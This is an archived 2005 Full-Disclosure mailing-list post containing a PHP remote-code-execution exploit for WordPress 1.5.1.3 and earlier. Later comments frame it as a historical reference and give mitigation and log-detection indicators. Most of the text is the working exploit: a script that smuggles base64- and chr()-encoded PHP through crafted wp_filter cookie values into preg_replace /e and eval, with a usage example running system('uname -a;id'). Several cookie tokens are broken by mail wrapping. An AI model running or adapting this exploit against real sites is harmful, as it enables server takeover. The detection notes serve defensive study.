(no subject)
From: <kartoffelguru () hush com>
Date: Tue, 9 Aug 2005 08:38:34 -0700
#!/usr/local/bin/php
<?php
/*
 * Archived 2005 proof-of-concept post (Full Disclosure, 2005-08-09) for a
 * remote code execution weakness in WordPress <= 1.5.1.3. The listing is
 * reproduced exactly as archived, including its mail-wrapping artefacts;
 * it is kept here as a historical/defensive reference, not as a tool.
 *
 * Precondition, as stated by the author below: the target PHP must have
 * register_globals enabled, so that request data (here, the Cookie header)
 * populates global variables. register_globals was removed in PHP 5.4, and
 * WordPress 1.5.x is long unsupported, so current deployments are not
 * exposed to this listing.
 *
 * Defensive notes:
 *  - Mitigation: run a supported PHP (register_globals gone) and a supported
 *    WordPress release.
 *  - Detection: the request is a plain GET over HTTP/1.0 whose Cookie header
 *    carries bracketed names such as `wp_filter[query_vars]...`,
 *    `cache_lastpostmodified[server]` and `cache_lastpostdate[server]`.
 *    Cookie names of that shape are unlikely in legitimate traffic and are a
 *    usable indicator in web-server, proxy or WAF logs.
 */
echo "Wordpress <= 1.5.1.3 - remote code execution 0-DDAAYY exploit\n";
echo "(C) Copyright 2005 Kartoffelguru\n\n";
echo "[!] info: requires register_globals turned on on target host\n\n";
// The single request below is sent through cURL, so the extension is mandatory.
if (!extension_loaded('curl')) { die ("[-] you need the curl extension activated...\n"); }
// Prints usage and exits; called whenever the command line is unusable.
function usage() { die ("usage:\n\t./wpx.php -h http://www.xyz.net/blog/ -c 'system(\"uname -a;id\");'\n\n"); }
// -h: target base URL (must start with http://); -c: PHP statement to run.
$options = getopt("h:c:");
if (count($options) < 1 || !isset($options['h'])) { usage(); }
$host = (is_array($options['h']) ? $options['h'][0]:$options['h']);
$cmd = (is_array($options['c']) ? $options['c'][0]:$options['c']);
if (!preg_match("/^http:\/\//", $host, $dummy)) { usage(); }
// Default payload when -c is absent or blank.
if (strlen(trim($cmd))==0) { $cmd = 'phpinfo();'; }
// The command is base64-encoded and re-expressed as a chr() concatenation
// before being wrapped in a second base64 layer that becomes a cookie value.
$code = base64_encode($cmd);
$cnv = "";
for ($i=0;$i<strlen($code); $i++) { $cnv.= "chr(".ord($code[$i]).")."; }
$cnv.="chr(32)";
$str = base64_encode('args[0]=eval(base64_decode('.$cnv.')).die()&args[1]=x ');
// Cookie string. The names reference WordPress hook/cache globals
// (wp_filter, cache_lastpostmodified, cache_lastpostdate); presumably these
// only become reachable because register_globals lets the Cookie header
// define them — not verifiable from this listing alone. Archived text is
// mail-wrapped mid-token in several values and is left exactly as found.
$cookie='wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_f ilter[query_vars][0][0][accepted_args]=0;';
$cookie.='wp_filter[query_vars][0][1][function]=base64_decode;wp_fil ter[query_vars][0][1][accepted_args]=1;';
$cookie.='cache_lastpostmodified[server]=//e;cache_lastpostdate[serv er]=';
$cookie.=$str;
$cookie.=';wp_filter[query_vars][1][0][function]=parse_str;wp_filter [query_vars][1][0][accepted_args]=1;';
$cookie.='wp_filter[query_vars][2][0][function]=get_lastpostmodified ;wp_filter[query_vars][2][0][accepted_args]=0;';
$cookie.='wp_filter[query_vars][3][0][function]=preg_replace;wp_filt er[query_vars][3][0][accepted_args]=3;';
// A single GET to the blog root, HTTP/1.0, with the crafted Cookie header
// and a browser-like User-Agent; the response body is echoed back.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $host);
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_COOKIE, $cookie);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_CURLOPT_REFERER, $host);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 
1.1.4322)");
curl_setopt($ch, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);
echo "[+] now executing\n\n";
$r = curl_exec($ch);
curl_close($ch);
echo $r;
?>
Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/